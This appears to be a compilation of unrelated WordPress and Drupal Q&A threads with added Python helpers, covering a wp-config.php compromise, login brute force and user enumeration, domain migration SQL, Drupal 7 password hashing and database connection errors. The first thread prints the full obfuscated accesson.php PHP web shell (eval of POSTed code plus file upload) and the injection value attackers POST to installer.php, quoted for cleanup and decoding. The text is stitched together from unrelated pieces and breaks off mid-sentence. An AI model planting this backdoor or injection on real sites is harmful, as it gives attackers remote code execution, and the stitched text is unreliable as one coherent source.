Wordpress hack keeps severing database connection - wordpress

I have a WordPress site that keeps severing its database connection, and I am not sure how to find, clean up, or get rid of the root cause.
The issue is that an odd script keeps popping up in the wp-config.php file. I delete it and correct the credentials, and the site comes back up just fine. In about a day or so, the same thing happens: the database credentials are reset and this foreign script appears again.
This is the output I keep seeing after the attack:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'test');
file_put_contents('accesson.php', '<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){#$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'); /*');
file_put_contents('accesson.php', '<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){#$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'); /*');
/** MySQL database username */
define('DB_USER', 'user');
/** MySQL database password */
define('DB_PASSWORD', 'taskh60J0f');
The code seems to reference accesson.php. So I looked at that file and this is the code that it has:
<?php echo 7457737+736723;$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48).chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61))){#$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))][base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))][base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>
I reset the DB connection again and deleted the accesson.php file from the root directory, but I am not 100% sure that this will not happen again. My question is: how do I clean this up 100%? I also want to note that I am not a developer. I know how to read code, but I am not really proficient at writing it. Any help would be greatly appreciated.

Had the same attack on a site we recently started hosting: repeated extra code added to the config and accesson.php dropped into the web root.
In our instance the cause of the problem was a file named installer.php and another file named installer-backup.php; these came with the site when we imported it.
In one of our protection plug-in threat logs we found repeated POST attempts to installer and installer-backup.php, with details as follows.
"name": "POST.dbname",
"value": "test\\');\nfile_put_contents(\\'accesson.php\\', \\'<?php echo 7457737+736723;$raPo_rZluoE=base64_decode(\\\"Y\\\".chr(109).\\\"F\\\".chr(122).chr(90).\\\"T\\\".chr(89).chr(48).chr(88).\\\"2\\\".\\\"R\\\".\\\"l\\\".\\\"Y\\\".chr(50).\\\"9\\\".chr(107).\\\"Z\\\".chr(81).\\\"=\\\".\\\"=\\\");$ydSJPtnwrSv=base64_decode(chr(89).\\\"2\\\".chr(57).chr(119).chr(101).chr(81).chr(61).\\\"=\\\");eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87).\\\"Q\\\".chr(61))]));if($_POST[base64_decode(\\\"d\\\".chr(88).chr(65).\\\"=\\\")] == base64_decode(\\\"d\\\".\\\"X\\\".chr(65).chr(61))){#$ydSJPtnwrSv($_FILES[base64_decode(chr(90).\\\"m\\\".\\\"l\\\".\\\"s\\\".chr(90).\\\"Q\\\".\\\"=\\\".chr(61))][base64_decode(chr(100).chr(71).chr(49).\\\"w\\\".\\\"X\\\".chr(50).\\\"5\\\".chr(104).\\\"b\\\".chr(87).\\\"U\\\".chr(61))],$_FILES[base64_decode(\\\"Z\\\".chr(109).\\\"l\\\".\\\"s\\\".chr(90).\\\"Q\\\".chr(61).chr(61))][base64_decode(chr(98).\\\"m\\\".\\\"F\\\".chr(116).\\\"Z\\\".chr(81).chr(61).\\\"=\\\")]);}; ?>\\'); \/*"
This creates the accesson.php file with the code as per the original post.
Decoding that gives:
echo 7457737+736723;
$raPo_rZluoE = 'base64_decode';
$ydSJPtnwrSv = 'copy';
eval(base64_decode($_POST['id']));
if($_POST['up'] == 'up'){copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);}
So it looks like accesson.php will do what its name suggests and provide a route to copy files onto the server.
This necessitated a total wipe out and rebuild after a manual scan of the db - which did not show anything suspicious.
Nothing untoward has happened since the rebuild, except that someone is making many attempts to POST to the now non-existent installer and installer-backup.php.
Interestingly, we have so far not seen any attempts to POST to accesson.php.
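As an added analysis helper (not part of either post above): the chr()/"x" concatenations in the dropper can be unwound in Python instead of being run through PHP, and the same script flags wp-config.php lines that should never contain file_put_contents, eval or superglobal lookups. The dropper string is the one quoted in the thread; the wp-config.php excerpt is constructed with a placeholder password.

```python
"""Analyst helper for the dropper shown in this thread: unwinds the
"Y".chr(109)... string concatenations inside base64_decode(...) without
executing any PHP, and flags lines that do not belong in wp-config.php."""
import base64
import re

# The accesson.php dropper from the post, split across lines here for readability.
DROPPER = (
    '<?php echo 7457737+736723;'
    '$raPo_rZluoE=base64_decode("Y".chr(109)."F".chr(122).chr(90)."T".chr(89).chr(48)'
    '.chr(88)."2"."R"."l"."Y".chr(50)."9".chr(107)."Z".chr(81)."="."=");'
    '$ydSJPtnwrSv=base64_decode(chr(89)."2".chr(57).chr(119).chr(101).chr(81).chr(61)."=");'
    'eval($raPo_rZluoE($_POST[base64_decode(chr(97).chr(87)."Q".chr(61))]));'
    'if($_POST[base64_decode("d".chr(88).chr(65)."=")] == base64_decode("d"."X".chr(65).chr(61)))'
    '{#$ydSJPtnwrSv($_FILES[base64_decode(chr(90)."m"."l"."s".chr(90)."Q"."=".chr(61))]'
    '[base64_decode(chr(100).chr(71).chr(49)."w"."X".chr(50)."5".chr(104)."b".chr(87)."U".chr(61))],'
    '$_FILES[base64_decode("Z".chr(109)."l"."s".chr(90)."Q".chr(61).chr(61))]'
    '[base64_decode(chr(98)."m"."F".chr(116)."Z".chr(81).chr(61)."=")]);}; ?>'
)

# One term of a PHP string concatenation: a double-quoted literal or chr(N).
TERM = re.compile(r'"([^"]*)"|chr\((\d+)\)')
# base64_decode( term . term . ... ) where every term is one of the above.
CALL = re.compile(r'base64_decode\(((?:(?:"[^"]*"|chr\(\d+\))\s*\.?\s*)+)\)')

# Constructs that have no business inside a wp-config.php define() block.
SUSPECT = re.compile(r'file_put_contents\(|\beval\(|base64_decode\(|\$_(POST|GET|FILES|REQUEST)\[')

# Constructed wp-config.php excerpt modelled on the post (credentials are placeholders).
SAMPLE_CONFIG = """\
/** The name of the database for WordPress */
define('DB_NAME', 'test');
file_put_contents('accesson.php', '<?php eval($_POST["id"]); ?>'); /*');
/** MySQL database username */
define('DB_USER', 'user');
/** MySQL database password */
define('DB_PASSWORD', 'PLACEHOLDER_PASSWORD');
"""


def join_terms(expr: str) -> str:
    """Evaluate '"Y".chr(109)."F"' -> 'YmF' by hand, never via eval()."""
    return ''.join(chr(int(num)) if num else lit for lit, num in TERM.findall(expr))


def decode_calls(php: str) -> list:
    """Every obfuscated base64_decode(...) argument, as (encoded, decoded) pairs."""
    pairs = []
    for m in CALL.finditer(php):
        encoded = join_terms(m.group(1))
        pairs.append((encoded, base64.b64decode(encoded).decode('utf-8', 'replace')))
    return pairs


def deobfuscate(php: str) -> str:
    """Rewrite the script with each hidden string shown as a plain PHP literal."""
    return CALL.sub(
        lambda m: "'%s'" % base64.b64decode(join_terms(m.group(1))).decode('utf-8', 'replace'),
        php)


def flag_config_lines(config: str) -> list:
    """1-based numbers of lines in wp-config.php that match an injection marker."""
    return [i for i, line in enumerate(config.splitlines(), 1) if SUSPECT.search(line)]


if __name__ == '__main__':
    for encoded, decoded in decode_calls(DROPPER):
        print(f'{encoded:24} -> {decoded}')
    print(deobfuscate(DROPPER))
    print('suspicious wp-config.php lines:', flag_config_lines(SAMPLE_CONFIG))
```

Running it prints the same decoded form the answer worked out by hand (base64_decode, copy, id, up, file, tmp_name, name), and flag_config_lines() is the check to run over wp-config.php after each cleanup to confirm the injection has not returned.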

Brute force attack / user enumeration

Since last week I keep getting alerts about failed login attempts on my wordpress site.
For the first couple of days the attacker used a wrong username and was subsequently locked out after 3 attempts. I use the Sucuri free and WP-Security plugins. The latter one has a login lockdown function.
My surprise came when, after a couple of days, the attacker found and used my username. I immediately changed it to a new username, thinking that I would be safe. I also used most of the hardening options on both plugins. I specifically checked that the string ?author=n does not provide any results on my website.
Regardless, today I got 3 more alerts that someone tried to log in with this new username, which means I am locked out of my own site for 24 hours.
This leaves me wondering:
a) how is it possible for someone to find my username?
b) is there any other plugin like cerber security that prevents these exploits?
c) is there any rule I can add to htaccess? (although I believe that sucuri and wp-security have added several rules)
many thanks!
listing users
A user can list your usernames using:
yoursite.com?author=1
where the ID is a user_id.
You can prevent it by detecting the author page and redirecting it, for example with this (put it in your theme's functions.php):
// Disable access to author pages
function remove_author_pages_page() {
    global $wp_query;
    if ( is_author() ) {
        $wp_query->set_404();
        status_header( 404 );
        wp_redirect( get_option( 'home' ) );
        exit; // wp_redirect() does not stop execution; without this the author page would still render
    }
}
add_action( 'template_redirect', 'remove_author_pages_page' );
Find username from wp-admin
An attacker can find a username by trying to log in on wp-admin.
If an attacker enters a valid username, even with a wrong password, the WordPress error message changes, so the attacker knows that the username exists.
You can add this code to your functions.php to stop the wp-admin wrong-login error messages from giving away any information.
code:
function no_wordpress_errors() {
    return '<strong>Error</strong>: check your logins';
}
add_filter( 'login_errors', 'no_wordpress_errors' );
prevent wp-admin brute force
This is a solution I really like: it uses the wp-fail2ban plugin.
Your server needs the fail2ban package installed and configured.
This package lets you ban (via iptables) IPs that fail too many times to connect over SSH, or that brute-force a port.
The wp-fail2ban plugin gives you a custom fail2ban jail to add to your fail2ban jails (the plugin has complete documentation about it).
With both installed, fail2ban will ban IPs that fail too often on wp-admin, at the iptables level, so PHP is not even reached. In the end the attacker won't use many server resources, since the server blocks their IP before a request can even reach PHP.
Some other plugins (like Wordfence) also provide some protection, but since the request reaches PHP, the attacker uses far more resources. On the other hand, they need less technical knowledge to implement.
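An added example (not part of the answer above) of the counting a fail2ban jail does, run in Python over constructed access-log lines: it reports an IP walking through ?author=N IDs and an IP repeating POSTs to wp-login.php inside a time window. The log lines, addresses and thresholds are constructed; the 200-versus-302 rule used to tell failed from successful logins is an assumption of this example and is labelled as such in the code.

```python
"""Detection over web-server access logs for the two behaviours in this thread:
author-ID enumeration via ?author=N and repeated wp-login.php POSTs from one IP.
Added example; it mirrors the counting that a fail2ban jail performs."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-format lines; the addresses are documentation ranges.
ACCESS_LOG = """\
203.0.113.7 - - [10/Mar/2014:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "curl/7.30.0"
203.0.113.7 - - [10/Mar/2014:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "curl/7.30.0"
203.0.113.7 - - [10/Mar/2014:10:00:03 +0000] "GET /?author=3 HTTP/1.1" 404 0 "-" "curl/7.30.0"
198.51.100.4 - - [10/Mar/2014:10:00:05 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:10:01:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3051 "-" "curl/7.30.0"
203.0.113.7 - - [10/Mar/2014:10:01:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3051 "-" "curl/7.30.0"
203.0.113.7 - - [10/Mar/2014:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3051 "-" "curl/7.30.0"
203.0.113.7 - - [10/Mar/2014:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3051 "-" "curl/7.30.0"
198.51.100.4 - - [10/Mar/2014:10:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2014:10:30:00 +0000] "POST /wp-login.php HTTP/1.1" 200 3051 "-" "curl/7.30.0"
"""

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
AUTHOR = re.compile(r'[?&]author=(\d+)')


def parse_log(text: str) -> list:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
        events.append({'ip': m['ip'], 'ts': ts, 'method': m['method'],
                       'path': m['path'], 'status': int(m['status'])})
    return events


def author_enumerators(events: list, min_ids: int = 3) -> dict:
    """IPs that requested at least min_ids distinct ?author=N values -> sorted IDs."""
    seen = defaultdict(set)
    for e in events:
        m = AUTHOR.search(e['path'])
        if m:
            seen[e['ip']].add(int(m.group(1)))
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= min_ids}


def login_bruteforcers(events: list, max_failures: int = 3,
                       window: timedelta = timedelta(minutes=10)) -> dict:
    """IPs with more than max_failures failed wp-login.php POSTs inside one window.

    Heuristic (assumption of this example): WordPress answers a failed login with
    200 and re-renders the form, and a successful login with a 302 redirect."""
    failures = defaultdict(list)
    for e in events:
        if e['method'] == 'POST' and e['path'].startswith('/wp-login.php') and e['status'] == 200:
            failures[e['ip']].append(e['ts'])
    offenders = {}
    for ip, times in failures.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):       # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count > max_failures:
                offenders[ip] = max(offenders.get(ip, 0), count)
    return offenders


if __name__ == '__main__':
    evts = parse_log(ACCESS_LOG)
    print('author enumeration:', author_enumerators(evts))
    print('login brute force :', login_bruteforcers(evts))
```

The two functions are the decision a jail makes before banning; the point of wp-fail2ban, as the answer says, is that after the ban the requests never reach PHP at all, whereas a plugin-only approach runs this kind of counting inside PHP on every request.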

How can I change entire URL when transfer same WordPress database to another domain database?

I have a WordPress site called www.myfirstwp.com.
I want to transfer its database to a new domain, which is www.mynewwp.com.
I did it by exporting the DB from www.myfirstwp.com and importing it into www.mynewwp.com.
But in this new site (www.mynewwp.com) the database still has all the old database's URLs.
So, how can I change every URL of the old (www.myfirstwp.com) database in the new (www.mynewwp.com) database? Is there any way to do this?
Thank you.
Update Question:
I have an issue in WordPress. When I try to import an XML file with attachments, it shows me the following error message:
Error Message :
Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator and inform them of the time the error occurred, and the actions you performed just before this error. More information about this error may be available in the server error log. Apache Server at mysite.com Port 80
What should I do to solve this type of error message, as I am a new user of WordPress?
Thank You.
NOTE: before you tinker with your database be sure to grab a backup first. You do not want to mess up a production database.
The simple way is to open the database on your new domain, open {$prefix}_options and change the home and siteurl rows to reflect the new domain.
This approach works and allows you to operate the site at a minimum. The other problems include:
Embedded media links which use the old domain
Other post meta fields and option fields that may contain the old domain.
What I do when this happens is use raw SQL inside phpMyAdmin (or similar) to search and replace. The following queries take care of post meta and options (95% of the time):
UPDATE wp_options SET option_value = REPLACE(option_value, 'olddomain.com', 'newdomain.com');
UPDATE wp_postmeta SET meta_value = REPLACE(meta_value, 'olddomain.com', 'newdomain.com');
The following tables and columns usually contain domain references in WP:
wp_options.option_value
wp_postmeta.meta_value
wp_posts.post_content
wp_posts.guid
But there might be more places where the domain has been inserted.
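The remaining cases the answer leaves out are usually serialized data: widget, theme and plugin settings in wp_options and wp_postmeta are stored as PHP serialize() output with s:N: byte counts, and a plain SQL REPLACE() rewrites the text but leaves those counts wrong, so unserialize() returns false for the row. Below is an added Python example (not the answer's SQL) that does the replacement per value and recomputes the lengths; the domains are the ones from the question and the sample option values are constructed.

```python
"""Domain search-and-replace for WordPress option/meta values that is safe for
PHP-serialized data. Added example: parse() and dump() cover the PHP types
WordPress stores (N, i, b, d, s, a, O), and migrate_value() recomputes the
s:N: byte counts that a plain SQL REPLACE() would leave wrong."""

OLD, NEW = 'www.myfirstwp.com', 'www.mynewwp.com'
# Constructed option_value as a widget or theme setting would look in wp_options.
SAMPLE = 'a:2:{s:4:"home";s:24:"http://www.myfirstwp.com";s:5:"width";i:640;}'


def parse(data: bytes, pos: int = 0):
    """Parse one serialized value at pos; return (tagged value, position after it)."""
    t = data[pos:pos + 1]
    if t == b'N':
        return ('N',), pos + 2
    if t in (b'i', b'b', b'd'):
        end = data.index(b';', pos)
        return (t.decode(), data[pos + 2:end].decode()), end + 1
    if t == b's':
        colon = data.index(b':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                      # skip ':"'
        if data[start + length:start + length + 2] != b'";':
            raise ValueError('string length does not match at offset %d' % pos)
        return ('s', data[start:start + length].decode('utf-8')), start + length + 2
    if t in (b'a', b'O'):
        colon = data.index(b':', pos + 2)
        name = None
        if t == b'O':
            name_len = int(data[pos + 2:colon])
            name = data[colon + 2:colon + 2 + name_len].decode('utf-8')
            pos = colon + 2 + name_len + 1     # now at the ':' before the member count
            colon = data.index(b':', pos + 1)
            count = int(data[pos + 1:colon])
        else:
            count = int(data[pos + 2:colon])
        pos = colon + 2                        # skip ':{'
        items = []
        for _ in range(count):
            key, pos = parse(data, pos)
            val, pos = parse(data, pos)
            items.append((key, val))
        if data[pos:pos + 1] != b'}':
            raise ValueError('missing } at offset %d' % pos)
        return (t.decode(), name, items), pos + 1
    raise ValueError('not a serialized value at offset %d' % pos)


def dump(value) -> bytes:
    """Serialize a tagged value back, recomputing every byte length."""
    t = value[0]
    if t == 'N':
        return b'N;'
    if t in ('i', 'b', 'd'):
        return ('%s:%s;' % (t, value[1])).encode('ascii')
    if t == 's':
        raw = value[1].encode('utf-8')
        return b's:%d:"%s";' % (len(raw), raw)
    _, name, items = value
    body = b''.join(dump(k) + dump(v) for k, v in items)
    if t == 'a':
        return b'a:%d:{%s}' % (len(items), body)
    raw_name = name.encode('utf-8')
    return b'O:%d:"%s":%d:{%s}' % (len(raw_name), raw_name, len(items), body)


def replace_in(value, old: str, new: str):
    """Apply the text replacement to every string, keys included, at any depth."""
    t = value[0]
    if t == 's':
        return ('s', value[1].replace(old, new))
    if t in ('a', 'O'):
        return (t, value[1], [(replace_in(k, old, new), replace_in(v, old, new))
                              for k, v in value[2]])
    return value


def is_serialized(raw: str) -> bool:
    """True when the whole string is one valid PHP-serialized value."""
    data = raw.encode('utf-8')
    try:
        return parse(data)[1] == len(data)
    except (ValueError, UnicodeDecodeError):
        return False


def migrate_value(raw: str, old: str, new: str) -> str:
    """What REPLACE(option_value, old, new) should have produced for one column value."""
    if not is_serialized(raw):
        return raw.replace(old, new)           # plain text: a simple replace is safe
    return dump(replace_in(parse(raw.encode('utf-8'))[0], old, new)).decode('utf-8')


if __name__ == '__main__':
    print('naive   :', SAMPLE.replace(OLD, NEW), is_serialized(SAMPLE.replace(OLD, NEW)))
    print('migrated:', migrate_value(SAMPLE, OLD, NEW))
```

Usage: select option_id and option_value from wp_options (and meta_id, meta_value from wp_postmeta), pass each value through migrate_value(), and write back only the rows that changed with a parameterised UPDATE; the home and siteurl rows are plain strings and come out the same as with the answer's REPLACE().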

Connect drupal site to moodle site

I am using Drupal 7.27, in which I need to connect to a Moodle site and its database. So I used the Drupal module moodle_connection to connect it with the Moodle site. As it does not offer any end-feature functionality, I installed another module called moodle_views, but unfortunately no data is received from Moodle. When I debugged, I found that the connection is not established between the two sites.
I am calling the moodle_connector_connect() function in a custom module to connect to Moodle, but with no success. In the Moodle connector settings I put the following information:
Database Type : mysql
Database Server : localhost
Database TCP Port : 3306
Database Name : drupal_moodle ('Name of the moodle database')
Database Prefix : mdl_
Database User : root
Database Password : (I don't have a password for my database user, so I left it blank)
Moodle URL : drupal_moodle (Moodle site url)
Please help me get out of this.
Regards
Neha
Reading over the bug reports for the Drupal module moodle_connector, I noticed some issues related to setting values for the Moodle database connection variables, and some issues with handling error conditions.
Combined with your mention of a blank password, this suggests the following lines might be the problem.
Reading moodle_connector.module, around line 51 I notice some lazy checking for unset parameters:
// Return false if settings are incomplete.
if (!$type || !$server || !$port || !$username || !$password || !$database) {
    return FALSE;
}
It looks like the check for !$password will cause the function moodle_connector_connect() to exit and not connect to the Moodle database if any of the values are unset or empty.
As a workaround, and a step in the right direction security-wise, you could create a new MySQL user, specifically grant it the privileges necessary for Drupal to read the Moodle DB, and set a password.
I would also strongly advise that you read the MySQL 'post installation' section of the manual, which advises setting a password on the root user accounts. Having no root password is convenient during initial installation, but is a security problem: any ordinary user on the machine, or on a nearby machine which can connect to port 3306, could gain full access to the database.
http://dev.mysql.com/doc/refman/5.1/en/postinstallation.html

How to create encrypted hash passwords for drupal 7

After searching the internet I came to know that with Drupal 7, passwords are no longer encrypted through md5.
What are the possible ways to get passwords encrypted in Drupal 7?
With Drupal 7, passwords are no longer encrypted through md5.
There are several ways to get/set a password in Drupal 7.
Using drush (for your information, not used in your case):
drush upwd admin --password="newpassword"
Without drush, if you have CLI access to the server (for your information, not used in your case):
cd <drupal root directory>
php scripts/password-hash.sh 'myPassword'
Now copy the resultant hash and paste it into the query:
update users set name='admin', pass='pasted_big_hash_from_above' where uid=1;
Thanks Malik.
After searching I found different solutions. The following solution also works.
If you are working on a remote environment to which you cannot connect, you can put this code in a file such as password.php, like this one:
<?php
if (isset($_GET['p'])) {
require_once dirname(__FILE__) . '/includes/bootstrap.inc';
require_once dirname(__FILE__) . '/includes/password.inc';
print _password_crypt('sha512', $_GET['p'], _password_generate_salt(DRUPAL_HASH_COUNT));
exit();
}
print "No password to hash.";
Then hit your site using http://domain.tld/password.php?p='MyPassword'. The hash will appear in your browser's tab.
Don't forget to remove it once you are done.
So, if you want to use some password generation function, have a look at _password_crypt() and _password_generate_salt().
The user_hash_password() function can be used to hash a password; if you want to use it from outside Drupal, you need to bootstrap the Drupal configuration.
chdir("/path/to/drupal");
require_once './includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_CONFIGURATION);
user_hash_password($password);
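An added example (not Drupal's code): the $S$ scheme that _password_crypt() and _password_generate_salt() implement, reimplemented in Python from Drupal 7's includes/password.inc as I understand it, so a hash can be generated or verified offline without bootstrapping Drupal or leaving a password.php reachable over HTTP. The alphabet, the 2^15 default iteration count and the 55-character truncation are what I recall from that file and are marked as assumptions in the code; the block verifies its own hashes, which is what can be checked here.

```python
"""Drupal 7 password hashing ($S$, the sha512 phpass variant) reimplemented in
Python. Added example, written from includes/password.inc as the author
understands it; constants below are assumptions taken from that file."""
import hashlib
import hmac
import math
import os
from typing import Optional

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_COUNT = 15        # DRUPAL_HASH_COUNT: 2**15 sha512 rounds (assumed default)
MIN_COUNT, MAX_COUNT = 7, 30
HASH_LENGTH = 55       # DRUPAL_HASH_LENGTH: the stored hash is truncated to 55 chars


def _b64(raw: bytes) -> str:
    """Drupal's _password_base64_encode: little-endian 6-bit groups over ITOA64."""
    out, i, n = [], 0, len(raw)
    while i < n:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def generate_salt(count_log2: int = HASH_COUNT) -> str:
    """_password_generate_salt: '$S$' + cost character + 8 chars from 6 random bytes."""
    count_log2 = min(max(count_log2, MIN_COUNT), MAX_COUNT)
    return '$S$' + ITOA64[count_log2] + _b64(os.urandom(6))


def password_crypt(password: str, setting: str) -> Optional[str]:
    """_password_crypt('sha512', ...): the 55-char hash, or None on malformed input."""
    if len(password) > 512:                       # Drupal refuses huge passwords (DoS guard)
        return None
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != '$' or setting[2] != '$':
        return None
    count_log2 = ITOA64.find(setting[3])
    if not MIN_COUNT <= count_log2 <= MAX_COUNT:
        return None
    salt, pw = setting[4:12], password.encode('utf-8')
    digest = hashlib.sha512(salt.encode('ascii') + pw).digest()
    for _ in range(1 << count_log2):              # stretched: 2**count_log2 extra rounds
        digest = hashlib.sha512(digest + pw).digest()
    output = setting + _b64(digest)
    expected = 12 + math.ceil(8 * len(digest) / 6)
    return output[:HASH_LENGTH] if len(output) == expected else None


def hash_password(password: str, count_log2: int = HASH_COUNT) -> str:
    """user_hash_password(): fresh salt each call, so two hashes of one password differ."""
    return password_crypt(password, generate_salt(count_log2))


def md5_hex(password: str) -> str:
    """The Drupal 6 scheme the question mentions: an unsalted md5 of the password."""
    return hashlib.md5(password.encode('utf-8')).hexdigest()


def legacy_md5_upgrade(md5_hash: str) -> str:
    """How a Drupal 6 md5 hash is carried over: rehash it and prefix 'U'."""
    return 'U' + hash_password(md5_hash)


def check_password(password: str, stored: str) -> bool:
    """user_check_password() for $S$ hashes and 'U$S$' hashes migrated from md5."""
    if stored.startswith('U$'):
        stored = stored[1:]
        password = md5_hex(password)
    if not stored.startswith('$S$'):
        return False
    computed = password_crypt(password, stored)
    return computed is not None and hmac.compare_digest(computed, stored)


if __name__ == '__main__':
    h = hash_password('myPassword')
    print(h, check_password('myPassword', h), check_password('wrong', h))
```

Usage: the value returned by hash_password() is what goes into users.pass in the UPDATE shown in the first answer, and check_password() is the verification side. Two hashes of the same password differ because a fresh salt is drawn each time; that is expected and is why the comparison must go through password_crypt() with the stored setting rather than through string equality.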

How to Resolve "Error Establishing a Database Connection" on WordPress XAMPP Localhost for Google App Engine

Following Google App Engine's instructions for creating a local WordPress development platform, I created the database and initial user using the instruction's MySQL direction:
CREATE DATABASE IF NOT EXISTS wordpress_db;
CREATE USER 'wp_user'@'localhost' IDENTIFIED BY 'wp_password';
GRANT ALL PRIVILEGES ON wordpress_db.* TO 'wp_user'@'localhost';
After running it without errors reported, MySQL subsequently reported back:
CREATE DATABASE IF NOT EXISTS wordpress_db;# 1 row affected.
CREATE USER 'wp_user'@'localhost' IDENTIFIED BY 'wp_password';# MySQL returned an empty result set (i.e. zero rows).
GRANT ALL PRIVILEGES ON wordpress_db.* TO 'wp_user'@'localhost';# MySQL returned an empty result set (i.e. zero rows).
While the command line runs dev_appserver.py, I try reaching the WordPress app and get instead:
Error establishing a database connection
I've removed and recreated the database (wordpress_db) and user (wp_user) without reaching the WP app.
Any suggestion how to resolve this is appreciated.
Thanks, this is my App Engine log:
2013-11-26 17:40:25 Running command: "['C:\Program Files\Python27\python.exe', u'C:\Program Files\Google\google_appengine\dev_appserver.py', '--skip_sdk_update_check=yes', '--port=8080', '--admin_port=8000', u'C:\Documents and Settings\User\My Documents\Catalyx\Catalyx-GoogleAppEngine\Catalyx']"
2013-11-26 17:40:26 (Process exited with code -1073741515)
As you have mentioned, you are following Google's own instructions...
then in the section titled...
Step 4. Create your wp-config.php configuration file
where the instructions state that you should replace the existing lines with the following:
/** The name of the database for WordPress */
define('DB_NAME', '**wordpress_db**');
/** MySQL database username */
define('DB_USER', '**wp_user**');
/** MySQL database password */
define('DB_PASSWORD', '**wp_password**');
You should enter those lines without the ** on either side of the words, like so...
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress_db');
/** MySQL database username */
define('DB_USER', 'wp_user');
/** MySQL database password */
define('DB_PASSWORD', 'wp_password');
When you hit the default root URL for your local app (normally localhost:8080) you may get some odd redirects, so instead go directly to the local WordPress install URL...
http://localhost:8082/wp-admin/install.php
You should then get the nice WordPress install page that you were expecting.
This happened to me and I had a very 'good' evening with it. So hopefully someone can find this problem earlier...
I am trying to replicate the server WordPress on localhost. After replacing the actual URL with localhost, things work perfectly. Except for one thing: the newly created page always shows "Error Establishing a Database Connection".
Let me put in sequence why this problem happened:
On my local PC I already had an old WordPress directory wp/
On the server my WordPress was placed under wp/
When I copied the package to my local PC, I placed it in wp2/ (remember, wp/ was already taken?)
So who's the culprit? It's the .htaccess:
RewriteBase /wp/
So it was pointing to the other database used by wp, which of course results in the error!
The fix is easy, just change it to wp2:
RewriteBase /wp2/
Voila! Cheers, and the evening suddenly became beautiful again! :)
To fix this problem, try these fixes:
